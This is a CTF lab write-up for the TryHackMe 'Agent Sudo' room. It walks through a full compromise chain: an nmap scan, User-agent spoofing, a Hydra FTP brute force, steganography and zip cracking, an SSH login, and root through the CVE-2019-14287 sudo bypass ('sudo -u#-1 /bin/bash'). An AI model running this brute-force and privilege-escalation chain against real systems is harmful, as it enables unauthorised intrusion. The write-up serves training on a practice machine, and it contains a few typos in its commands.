Agent Sudo TryHackMe Writeup | By Xploit Ayush
You found a secret server located under the deep sea. Your task is to hack inside the server and reveal the truth.
The challenging room in the beginners path the in Agent sudo in Tryhackme
The lab is Quite slowly, so we have to wait for port scanning.
So let’s begin there is so much to learn.
A) First we will do NMAP
nmap -sV -sC -A 10.10.111.153
Port 21, 22 and 80 are open, but we can’t get into FTP using Anonymously because it ask for username and password.
so we look in port 80 what web page is running on Http
It says change the User-agent to bypass this page so what we can do?
We use proxy tool ‘Burpsuite’ what is it? tool used for Penetration testing.
Use burp to intercept the request Now change the user-agent to C
With User-agent set to C
, we are redirected to http://10.10.111.153/agent_C_attention.php
, where we can see the following message:
I assumed that “chris” must be the user of the system.
so what we can do here?
Now we know the username is chris so we can use ‘Hydra’ to brute force to get user FTP credentials.
type in
hydra -l chris -P /usr/share/wordlists/rockyou.txt ftp://10.10.111.153
so we got the password!
log in using FTP Credentials
ftp 10.10.111.153
use *mget / get cmd to download to the files into are local system.
We can use Exiftool or steghide tool to get metadata of the image.
Now bin walk the files and in cutie.png we found something
binwalk -e cutie.png
to check all extracted using cd cutie.png_extracted
Now we need to crack the password for the 8702.zip file
zip2john 8702.zip > out.txt
jonh --wordlist=/usr/share/wordlists/rockyou.txt out.txt
We get our password as ‘alien’
Now extract the content
7z e 8702.zip
there is also a file called To_agent.txt
cat To_agentR.txt
we have to decode this using type in
echo "QXJlYTUx" | base64 -d
We get Area51
Now let’s extract the text or file from cute-alien.jpg
steghide extract -sf cute-alien.jpg
# Enter Area51 as passphrase
cat message.txt
so we got SSH Credentials of James
Next step is we try to log in using SSH credentials
ssh james@10.10.111.153
We got the SHELL!!!
We got user flag!
we try to get Alien autospy.jpg using type in
sudo scp james@10.10.111.153:Alien_autospy.jpg
Get the image and now on reverse searching we found our answers
To get root flag we need to check what permissions or privileges do we have
This one is a little bit tryckier. First type in the command.
sudo -l
We need CVE so
CVE-2019–14287
Escalate the privileges
sudo -u#-1 /bin/bash
Finally we got our ROOT flag !!!
Now we have all our Answers let’s submit it and we have successfully completed our CTF !!
Keep Trying, Keep Working :)
Thank you for Reading!!
Happy Hacking
Follow me more to get more tips and tricks! 🙏
Author: Xploit Ayush